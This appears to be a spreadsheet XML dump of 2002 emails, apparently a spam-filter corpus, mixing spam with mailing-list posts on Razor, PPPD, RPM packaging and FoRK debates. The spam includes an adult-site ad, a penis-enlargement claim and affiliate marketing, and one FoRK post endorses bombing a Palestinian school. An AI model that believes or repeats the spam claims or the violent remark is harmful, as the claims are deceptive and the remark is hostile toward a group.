             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-131.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-211.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-174.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-148.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;/TBODY&gt;
                 &lt;/TABLE&gt;
                 &lt;font face="verdana" size="7"&gt;&lt;B&gt;&lt;A
       onmouseover="window.status='BIGbigS - Nothing but horny amateurs with huge big tits!';return true"
       href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
       color=red&gt;MAIN PAGE&lt;/FONT&gt;&lt;/A&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="verdana"&gt;&lt;B&gt;&lt;BR&gt;
                 &lt;/B&gt;&lt;FONT
       size=3&gt;Huge big titties @ bigbigs.com! &lt;BR&gt;
                 &lt;BR&gt;
                 &lt;FONT size=2&gt;&lt;B&gt;&lt;A
       onmouseover="window.status='BIGbigS - Nothing but horny amateurs with huge big tits!';return true"
       href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
       color=red&gt;MORE SAMPLE PICS&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;FONT
       color=red&gt;MORE SAMPLE MOVIES&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;FONT
       color=red&gt;LIST OF GIRLS&lt;/FONT&gt;&lt;/A&gt; &lt;BR&gt;
                 &lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/font&gt;&lt;/FONT&gt;
               &lt;/CENTER&gt;
             &lt;/TD&gt;
           &lt;/TR&gt;
           &lt;/TBODY&gt;
         &lt;/TABLE&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p align="left"&gt;&lt;a href="http://www.jeweldive.com:81/herbalo/bpenis/index.html"&gt;&lt;font size="+2"&gt;CLICK
           HERE&lt;/font&gt;&lt;/a&gt;&lt;font size="+2"&gt; to enlarge your PENIS 3-4 inches NATURALLY!!!&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;div align="left"&gt;&lt;a href="http://www.jeweldive.com:81/removal/boca/"&gt;Click
           Here&lt;/a&gt; to be removed&lt;/div&gt;
         &lt;p&gt;&lt;font face="verdana"&gt;&lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;/font&gt;&lt;/p&gt;
       &lt;/CENTER&gt;
     &lt;/CENTER&gt;&lt;/CENTER&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 23, 2002 at 05:28:33PM -0400,
 Scott Henderson &lt;boyhowdy@cyberspace.org&gt; is thought to have said:
 &gt; What am I missing?  Thanks!
 Razor/Client.pm is part of Razor v1. You've installed Razor v2.
 Spamassassin's current release only works with v1. Although IIRC
 the current CVS code works with v2.
 Tabor
 -- 
 --------------------------------------------------------------------
 Tabor J. Wells                                razor-users@fsckit.net
 Fsck It!                 Just another victim of the ambient morality
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] PPPD disconnects on me!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello folks!
 I'm new to Linux, so here goes...
 I've been trying to get connected to the outside world through my modem.
 I've got Debian with kernel 2.4.18.
 I've got this Win-Modem(yes, I know) and managed to locate a proper driver
 for it.
 Minicom is very much able to dial out.
 But there seems to be a problem with my PPPD installation.
 When I type 'ppp' in the minicom terminal, all I get (after the initial info
 of my dynamic IP, etc) is a ~ and then the NO CARRIER signal.
 Then I looked into calling pppd directly using chat.
 I used this command:  pppd call Provider (where Provider is some script
 somewhere).
 It dials, it connects, it sends my username &amp; password, and when connection
 is established, it gives the SIGHUP signal and exits.
 This is confirmed when me friend and I tried to connect through a serial
 port using pppd to connect ttyS0.  I ran pppd waiting for a connection, me
 friend tried connecting and as soon as he did, pppd exited.
 Some expert help would be greatly appreciated as I'm sick and tired of
 having to reboot, get into Windoze to hook up to the net and then back to
 Linux, mounting this drive to get that file, etc.  It'd be nice never have
 to go back to Windoze(except for games, that is).
 Thanks a million.
 Carlos
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Classic Novels, Aesop's Fables, Issue 49
</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------------------------------------------------------------
 Norton SystemWorks Pro 2002 $29.95, 90% Off Retail!!
 http://www.adreporting.com/dir.php?a=167673&amp;p=134&amp;w=text
 ---------------------------------------------------------------------------
 Friday, September 13 2002
 ==================================================================
                Classic Novels - In 5 Minutes A Day!
                         -Novels on Demand-
                           Fables - Aesop
 ==================================================================
                          Announcements
 Sorry!  We are having difficulties with our database again.  Due to a corruption caused by our new host, we have lost a great deal of subscribers.  We are working on restoring from a backup.  If you are receiving some, but not all of your novels, we apologize.  We'll try to get back to full swing as soon as possible.
 **August Appreciation Sale Extended**
 To show our appreciation to our readers we're offering our 5400+ MS-Reader CD set on Ebay for only $6.95! Visit our website at http://www.classic-novels.com and click on the 'Visit Ebay' link. This is the same set of 5400+ books normally priced at $12.00!  Check out our other educational CDs, America At War:The Civil War, Mars Pathfinder 3D Gallery, Early American Animation and Air Power:US Air Force Aircraft.
 Want a list of the newest titles?  Send an email to:
 mailto:whatsnew@classic-novels.com
 ==================================================================
 The Wolf in Sheep's Clothing 
 ONCE UPON A TIME a Wolf resolved to disguise his 
 appearance in order to secure food 
 more easily. Encased in the skin of a sheep, he 
 pastured with the flock deceiving the shepherd 
 by his costume. In the evening he was shut up by 
 the shepherd in the fold; the gate was closed, 
 and the entrance made thoroughly secure. But the 
 shepherd, returning to the fold during the night 
 to obtain meat for the next day, mistakenly 
 caught up the Wolf instead of a sheep, and 
 killed him instantly. 
 Harm seek. harm find. 
 ==================================================================
 You are subscribed to Aesop's Fables as:
 mothlight@fastmail.fm
 If you would like to unsubscribe, click on the link below.
 http://www.classic-novels.com/cgi-bin/arp3/arp3-un.pl?c=8530&amp;p=5514
 ==================================================================
 Classic Novels - In 5 Minutes A Day!
 Copyright 2002 Kevin S Peterson
 Visit us online at http://www.classic-novels.com
 or contact us at mailto:comments@classic-novels.com
 ---------------------------------------------------------------------------
 Fun &amp; Functional! Say the Time
 It's the newest evolution of the cuckoo clock. Try it FREE!
 http://www.adreporting.com/dir.php?a=167673&amp;p=138&amp;w=text
 ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 21, 2002 at 04:15:16PM -0500, Lance wrote:
 &gt; So to update from GNOME 1.4 to 2.0, after modifying
 &gt; /etc/apt/sources.list, I just issue 'apt-update' then 'apt-install
 &gt; gnome-session' ?
 Apparently, yes. Though for me it did suggest all sorts of creepy stuff.
 After installing packages one by one and removing some old stuff and
 whatnot, the original gnome-session from there suddenly no longer
 wanted parted and all that. Go figure.
 &gt; Also Gaim doesn't work with GNOME 2.0 just yet?
 If you strip out the gnome stuff, it still runs as a Gtk app without the
 applet. Maybe you can even leave in the old panel and all that but I
 think some files will conflict and have to be overridden with
 --replace-files (dangerous). I just rebuilt gaim and made a few changes
 to the .spec adding --without-gnome to %configure or such. It might be
 nice to separate the panel version from the actual program like debian
 does.
 Also, bubblemon no longer compiled for me and Yelp had some broken
 dependency there.
 -- 
 If you only want to go 500 miles, can you begin with a halfstep?
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 26, 2002 at 07:14:54PM +0200, Matthias Saou wrote:
 &gt; I've repackaged the new gkrellm 2.0.0 which is now ported to gtk2
 &gt; (woohoo!). Unfortunately, the plugins are incompatible with the
 &gt; previous 1.2.x ones, and since not many/all have been ported yet, I
 &gt; prefer not to release the package on the main freshrpms.net site for
 &gt; now.
 You could go the same way as the others and call it gkrellm2 and
 conflict with v1 if the executables or paths are the same.
 -- 
 Hey, you're right. I don't want to call a destructor on my objects,
 I want to call a *destroyer*. Gozer has come for your memory,
 little PersistentNode!
 		-- Joel Gluth 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Manoj Kasichainula wrote;
 &gt;http://www.snopes.com/quotes/bush.htm
 &gt;
 &gt;Claim:   President George W. Bush proclaimed, "The problem with
 &gt;the French is that they don't have a word for entrepreneur."
 &gt;
 &gt;Status:   False.
 &gt;Lloyd Grove of The Washington Post was unable to reach Baroness
 &gt;Williams to gain her confirmation of the tale, but he did
 &gt;receive a call from Alastair Campbell, Blair's director of
 &gt;communications and strategy. "I can tell you that the prime
 &gt;minister never heard George Bush say that, and he certainly
 &gt;never told Shirley Williams that President Bush did say it,"
 &gt;Campbell told The Post. "If she put this in a speech, it must
 &gt;have been a joke."
 So some guy failed to reach the source, but instead got spin doctor to
 deny it.  Wot, is he thick enough to expect official confirmation
 that, yes, Blair is going around casting aspersions on Bush???
 It's an amusing anecdote, I don't know if it's true or not, but certainly
 nothing here supports the authoritative sounding conclusion "Status: False".
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: How the other half gives
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534328
 Date: Not supplied
 The new Neiman Marcus Christmas catalog is out (in October!), including 
 you-as-an-action-figure ($7,500), a bamboo hut ($15,000) and a leather frisbee 
 ($30). Link[1] Discuss[2]
 [1] http://www.neimanmarcus.com/store/sitelets/christmasbook2002/fc.htm?navAction=jump&amp;promo=home2
 [2] http://www.quicktopic.com/boing/H/sWabFeGyB5u4C
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Call this a party?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,2,215/
 Date: 2002-10-03T04:21:05+01:00
 Bill Clinton and a tale of two Tonys. *Howard Jacobson* on his first Labour 
 party conference.
</t>
  </si>
  <si>
    <t xml:space="preserve">There is an "Update all scan caches" menu entry that rescans your
 folders similar to the short scripts folks have shared around.  It
 runs in the background.
 &gt;&gt;&gt;Rick Baartman said:
  &gt; &gt; &gt; On Mon, 9 Sep 2002, Rick Baartman wrote:
  &gt; &gt; Thanks Tom and Jacob. The above works, but without the double quotes: 
 i.e.
  &gt; &gt; 
  &gt; &gt; sh -c 'for f in `folders -recurse -fast` ; do sortm +"$f" ; done'
  &gt; &gt; 
  &gt; But there is a problem with making changes outside of exmh: the 
 .xmhcache fi
      les 
  &gt; don't get updated. This is dangerous; I have to remember to re-scan each 
 fol
      der 
  &gt; I enter. Is there a safeguard for this?
  &gt; 
  &gt; --
  &gt; rick
  &gt; 
  &gt; 
  &gt; 
  &gt; 
  &gt; _______________________________________________
  &gt; Exmh-users mailing list
  &gt; Exmh-users@redhat.com
  &gt; https://listman.redhat.com/mailman/listinfo/exmh-users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</si>
  <si>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RE: dylsexics of the wrold, untie!
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; If the text recognition algorithm/architecture humans use is anything
 &gt; like the algorithm/structure we've been working with, the reason the
 &gt; first letter (and to a lesser extent, the last letter) is important is
 &gt; that without it the text pattern recognition problem is exponentially
 &gt; more difficult (from a theoretical standpoint anyway) and has to be
 &gt; resolved using deeper abstraction analysis.  The middle letters are far
 &gt; less important and computationally much easier to resolve correctly.
 I think keeping the number of middle letters consistent with the correct
 spelling is important.  Would be interesting to see if this same effect is
 applicable to written forms of other languages, maybe even Japanese romongi.
 Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">
 It wasn't gloating, it was one for the horror file.
 And of course for the Palestinians it wasn't a mistake, which is a key
 part of the horror.
 I'm not against American taxpayers remodeling a school honoring a killer
 if we do it with a daisy cutter.
 &gt; -----Original Message-----
 &gt; From: Geege Schuman [mailto:geege@barrera.org]
 &gt; Sent: Saturday, October 05, 2002 9:35 PM
 &gt; To: johnhall@evergo.net; FoRK
 &gt; Subject: RE: Our friends the Palestinians, Our servants in government.
 &gt; 
 &gt; she read the links. what must it be like, she wondered, to devote ones
 &gt; life
 &gt; to pointing out  neighbors' mistakes, mishaps, inconsistencies and
 &gt; frailties?
 &gt; 
 &gt; gloating is definitely underrated in the good book - eh, john?
 &gt; 
 &gt; bring it on,
 &gt; gg
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 John
 &gt; Hall
 &gt; Sent: Saturday, October 05, 2002 11:56 PM
 &gt; To: FoRK
 &gt; Subject: Our friends the Palestinians, Our servants in government.
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; Hijacker High (8/30)
 &gt; Dalal Mughrabi was a Palestinian woman who participated in a 1978 bus
 &gt; hijacking in which 36 Israelis and an American nature photographer,
 Gail
 &gt; Ruban, were killed. Mughrabi has a Palestinian high school named after
 &gt; her, and it's apparently starting to show signs of wear. Fortunately,
 &gt; the United States Agency for International Development has stepped in
 &gt; with money to help renovate it.
 &gt; 
 &gt; http://reason.com/brickbats/bb-april.shtml
 &gt; 
 &gt; Links to:
 &gt; 
 &gt;
 http://www.cnsnews.com/ViewForeignBureaus.asp?Page=\ForeignBureaus\archi
 &gt; ve\200208\FOR20020807e.html
 &gt; 
 &gt; Praeterea censeo Palestininem esse delendam.
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">XDegrees was at the WebDAV Interoperability Testing Event last year, so
 there may be some DAV under the hood there someplace.
 - Jim
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 &gt; Gordon Mohr
 &gt; Sent: Wednesday, September 11, 2002 12:00 AM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Re: Microsoft buys XDegress - more of a p2p/distributed data
 &gt; thing...
 &gt;
 &gt;
 &gt; Mr. FoRK writes:
 &gt; &gt; "Files can be cached on multiple systems randomly scattered around the
 &gt; &gt; Internet, as with Napster or Freenet. In fact, the caching in
 &gt; XDegrees is
 &gt; &gt; more sophisticated than it is on those systems: users with high
 &gt; bandwidth
 &gt; &gt; connections can download portions, or "stripes," of a file from several
 &gt; &gt; cached locations simultaneously. The XDegrees software then reassembles
 &gt; &gt; these stripes into the whole file and uses digital signatures
 &gt; to verify that
 &gt; &gt; the downloaded file is the same as the original. A key component of this
 &gt; &gt; digital signature is a digest of the file, which is stored as
 &gt; an HTTP header
 &gt; &gt; for the file."
 &gt;
 &gt; This "more sophisticated than [Napster or Freenet]" part seems
 &gt; to be the same behavior implemented in many other P2P CDNs,
 &gt; such as:
 &gt;
 &gt;   - Kazaa
 &gt;   - EDonkey/Overnet
 &gt;   - BitTorrent
 &gt;   - Gnutella (with HUGE extensions)
 &gt;   - OnionNetworks WebRAID
 &gt;
 &gt; ...though the quality of the "digest" used by each system varies
 &gt; wildly.
 &gt;
 &gt; - Gordon
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Become an affiliate. Devenez site affili.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
     &lt;HEAD&gt;
     &lt;style type="text/css"&gt;
     BODY { FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif }
     H1 { MARGIN-TOP: 5px; FONT-WEIGHT: bold; FONT-SIZE: 18px; MARGIN-BOTTOM: 2px; FONT-FAMILY: Arial, Helvetica, sans-serif }
 	H2 { MARGIN-TOP: 3px; FONT-WEIGHT:bold; FONT-SIZE: 16px; MARGIN-BOTTOM: 2px; FONT-FAMILY: Arial, Helvetica, sans-serif } 
 	H3 { MARGIN-TOP: 2px; FONT-WEIGHT: bold; FONT-SIZE: 14px;MARGIN-BOTTOM: 2px; FONT-FAMILY: Arial, Helvetica, sans-serif } 
 	TD { FONT-SIZE: 12px; FONT-FAMILY: Arial,Helvetica, sans-serif }
 	p { FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif } 
 	A:hover { COLOR: #ff0000 } 
 	A:active { COLOR: #ff0000 } 
    	HR { HEIGHT: 1px }
 	&lt;/style&gt;
     &lt;/HEAD&gt;
     &lt;body rightmargin="0" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="5"&gt;
   &lt;tr&gt;
                 &lt;td&gt;
                     &lt;h2&gt;&lt;a name="En"&gt;&lt;/a&gt;&lt;/h2&gt;
                     &lt;h2&gt;With Artprice, the world leader in art market information, enhance your
                         website content! &lt;br&gt;
                         Make the most valuable information on artist available to your customers,
                         and get high commissions!
                     &lt;/h2&gt;
                     Posez sur votre site la barre de recherche Artprice et bnficiez immdiatement
                     de revenus supplmentaires&amp;nbsp;&lt;a href="#fr"&gt;(en fran&amp;ccedil;ais)&lt;/a&gt;&lt;br&gt;
                     &lt;br&gt;
 &lt;!-- search artprice --&gt;
                 &lt;table border="0" id="TableEn" align="center" cellpadding="2" cellspacing="0"&gt;
         &lt;tr&gt; 
           &lt;form method="get" action="http://web.artprice.com/en/artistsearch.aspx"&gt;
             &lt;td&gt; &lt;a href="http://web.artprice.com/"&gt;&lt;img src="http://web.artprice.com/Img/B/artprice_140.gif" align="absMiddle" border="0" alt="artprice"&gt;&lt;/a&gt; 
               &lt;input type="text" name="searcharti" size="25"&gt;
               &lt;input type="submit" value="Search this artist" style="CURSOR: hand"&gt;
               &lt;input type="hidden" name="L" value="en"&gt;
             &lt;/td&gt;
           &lt;/form&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 &lt;!-- search artprice --&gt;
                     &lt;h2&gt;Paying right from the moment the link is available to your visitors
                         !
                         &lt;!-- search artprice --&gt;
                     &lt;/h2&gt;
                     &lt;table width="90%" border="0" cellspacing="1" cellpadding="3" align="center"&gt;
                         &lt;tr&gt;
                             &lt;td&gt;
                                 &lt;h3&gt;&lt;font color="#ff0000"&gt;By becoming an Artprice affiliate, each
                                         month you'll get from 20 to 50% in revenue share for all purchases
                                         at www.artprice.com by customers coming from your site.&lt;/font&gt;&lt;/h3&gt;
                             &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;
                             &lt;td&gt;
                                 &lt;table width="100%" border="0" cellspacing="1" cellpadding="2" bgcolor="#999999"&gt;
                                     &lt;tr bgcolor="#e0dfde" align="middle"&gt;
                                         &lt;td&gt; &lt;font size="1"&gt;Total monthly purchase&lt;/font&gt;&lt;/td&gt;
                                         &lt;td&gt; &lt;font size="1"&gt;Commission rate&lt;/font&gt;&lt;/td&gt;
                                         &lt;td&gt; &lt;font size="1"&gt;Monthly revenue share&lt;/font&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                     &lt;tr bgcolor="#fff4f0" valign="baseline"&gt;
                                         &lt;td nowrap&gt;&lt;b&gt;From USD0 to USD1000 &lt;/b&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#fffbef"&gt;&lt;b&gt;20%&lt;/b&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#fff7de"&gt;&lt;b&gt;Up to USD200 &lt;/b&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                     &lt;tr bgcolor="#fff4f0" valign="baseline"&gt;
                                         &lt;td nowrap bgcolor="#fffaea"&gt;&lt;b&gt;From USD1001 to USD5000&lt;/b&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#fff7de"&gt;&lt;font size="4"&gt;&lt;b&gt;&lt;font size="3"&gt;30%&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#ffefce"&gt;&lt;b&gt;From USD&lt;font size="2"&gt;300&lt;/font&gt;
                                                 to USD&lt;font size="3"&gt;1500&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                     &lt;tr bgcolor="#ffe7bd" valign="baseline"&gt;
                                         &lt;td nowrap bgcolor="#fff4dd"&gt;&lt;b&gt;From USD5001 to USD15000 &lt;/b&gt;
                                         &lt;/td&gt;
                                         &lt;td nowrap bgcolor="#ffefce"&gt;&lt;font size="6"&gt;&lt;b&gt;&lt;font size="4"&gt;40%&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                         &lt;td nowrap&gt;&lt;b&gt;From USD&lt;font size="4"&gt;&lt;font size="3"&gt;2000&lt;/font&gt;&lt;/font&gt;
                                                 to USD&lt;font size="4"&gt;6000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                     &lt;tr bgcolor="#fff4f0" valign="baseline"&gt;
                                         &lt;td nowrap bgcolor="#ffefce"&gt;&lt;b&gt;Over USD15 001 &lt;/b&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#fee7ba"&gt; &lt;font size="7"&gt;&lt;b&gt;&lt;font size="5"&gt;50%&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#ffdfa4"&gt;&lt;b&gt;Over USD&lt;font size="5"&gt;7500&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                 &lt;/table&gt;
                             &lt;/td&gt;
                         &lt;/tr&gt;
                     &lt;/table&gt;
                     &lt;ul&gt;
         &lt;li&gt;
           &lt;p&gt;More information on our affiliation program!&amp;nbsp;&lt;a href="mailto:marketing@artprice.com?subject=Affiliation"&gt;Marketing@artprice.com&lt;/a&gt; 
             &lt;br&gt;
             Tel : +33 472 421 732 or +33 478 220 000&lt;br&gt;
           &lt;/p&gt;
         &lt;/li&gt;
                     &lt;/ul&gt;
                     &lt;p&gt;&lt;a href='http://list.artmarket.com/default.aspx?E=fork@xent.com&amp;L=1'&gt;To be removed from our mailing list&lt;/a&gt;&lt;/p&gt;
                     &lt;br&gt;
       &lt;br&gt;
       &lt;br&gt;
       &lt;br&gt;
       &lt;br&gt;
       &lt;br&gt;
       &lt;br&gt;
       &lt;br&gt;
       &lt;br&gt;
 					&lt;br&gt;
                     &lt;br&gt;
                     &lt;a name="fr"&gt;&lt;/a&gt;&lt;a href="#En"&gt;(In english)&lt;/a&gt;
                     &lt;h2&gt;Avec Artprice, le leader mondial de l'information sur le march&amp;eacute;
                         de l'art, enrichissez votre contenu en offrant aux visiteurs de votre
                         site la barre de recherche artistes Artprice &lt;/h2&gt;
 &lt;!-- search artprice --&gt;
     &lt;table border="0" id="TableFR" align="center" cellpadding="2" cellspacing="0"&gt;
         &lt;tr&gt;
           &lt;form method=get action="http://web.artprice.com/fr/artistsearch.aspx"&gt;
 		  &lt;td&gt;
             &lt;a href="http://web.artprice.com/"&gt;&lt;img src="http://web.artprice.com/Img/B/artprice_140.gif" align="absMiddle" border="0" alt="artprice"&gt;&lt;/a&gt; 
             &lt;input type=text name=searcharti size=25&gt;
             &lt;input type=submit value="Chercher cet artiste" style="CURSOR: hand"&gt;
             &lt;input type=hidden name=L value=fr&gt;
 			&lt;/td&gt;
         &lt;/form&gt;
                           &lt;/tr&gt;
                     &lt;/table&gt;
                     &lt;h2&gt;...et bnficiez immdiatement de revenus supplmentaires comme dj
                         des centaines d'autres affilis !
                         &lt;!-- search artprice --&gt;
                     &lt;/h2&gt;
                     &lt;table width="90%" border="0" cellspacing="1" cellpadding="3" align="center"&gt;
                         &lt;tr&gt;
                             &lt;td&gt;
                                 &lt;h3&gt;&lt;font color="#ff0000"&gt;Artprice vous reverse tous les mois de 20%
                                          50% sur les achats effectus par les clients venant de votre site
                                         :&lt;/font&gt;&lt;/h3&gt;
                             &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;
                             &lt;td&gt;
                                 &lt;table width="100%" border="0" cellspacing="1" cellpadding="2" bgcolor="#999999"&gt;
                                     &lt;tr bgcolor="#e0dfde" align="middle"&gt;
                                         &lt;td&gt; &lt;font size="1"&gt;Tranche de CA mensuel HT&lt;/font&gt;&lt;/td&gt;
                                         &lt;td&gt; &lt;font size="1"&gt;Taux de reversion&lt;/font&gt;&lt;/td&gt;
                                         &lt;td&gt; &lt;font size="1"&gt;Montant de la reversion mensuelle&lt;/font&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                     &lt;tr bgcolor="#fff4f0" valign="baseline"&gt;
                                         &lt;td nowrap&gt;&lt;b&gt;&amp;nbsp;De 0  1000 euros&lt;/b&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#fffbef"&gt;&lt;b&gt;20%&lt;/b&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#fff7de"&gt;&lt;b&gt;Jusqu' 200 euros&lt;/b&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                     &lt;tr bgcolor="#fff4f0" valign="baseline"&gt;
                                         &lt;td nowrap bgcolor="#fffaea"&gt;&lt;b&gt;&amp;nbsp;De 1001  5000 euros&lt;/b&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#fff7de"&gt;&lt;font size="4"&gt;&lt;b&gt;&lt;font size="3"&gt;30%&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#ffefce"&gt;&lt;b&gt;De &lt;font size="2"&gt;300&lt;/font&gt; 
                                                 &lt;font size="3"&gt;1500&lt;/font&gt; euros&lt;/b&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                     &lt;tr bgcolor="#ffe7bd" valign="baseline"&gt;
                                         &lt;td nowrap bgcolor="#fff4dd"&gt;&lt;b&gt;&amp;nbsp;De 5001  15000 euros&lt;/b&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#ffefce"&gt;&lt;font size="6"&gt;&lt;b&gt;&lt;font size="4"&gt;40%&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                         &lt;td nowrap&gt;&lt;b&gt;De&lt;font size="4"&gt; &lt;font size="3"&gt;2000&lt;/font&gt;&lt;/font&gt;
                                                  &lt;font size="4"&gt;6000&lt;/font&gt; euros&lt;/b&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                     &lt;tr bgcolor="#fff4f0" valign="baseline"&gt;
                                         &lt;td nowrap bgcolor="#ffefce"&gt;&lt;b&gt;&amp;nbsp;Au dessus de 15 000 euros&lt;/b&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#fee7ba"&gt; &lt;font size="7"&gt;&lt;b&gt;&lt;font size="5"&gt;50%&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                         &lt;td nowrap bgcolor="#ffdfa4"&gt;&lt;b&gt;Plus de &lt;font size="5"&gt;7500&lt;/font&gt;
                                                 euros&lt;/b&gt;&lt;/td&gt;
                                     &lt;/tr&gt;
                                 &lt;/table&gt;
                             &lt;/td&gt;
                         &lt;/tr&gt;
                     &lt;/table&gt;
                     &lt;ul&gt;
                         &lt;li&gt;
                             &lt;p&gt;Plus d'informations sur notre programme d'affiliation : &lt;a href="mailto:marketing@artprice.com?subject=Affiliation"&gt;
                                     Marketing@artprice.com&lt;/a&gt; &lt;br&gt;
                                 Tl : +33 472 421 732 ou +33 478 220 000&lt;/p&gt;
                         &lt;/li&gt;
                     &lt;/ul&gt;
                     &lt;p&gt;&lt;a href='http://list.artmarket.com/default.aspx?E=fork@xent.com&amp;L=1'&gt;Se dsinscrire&lt;/a&gt;&lt;/p&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
     &lt;/td&gt;
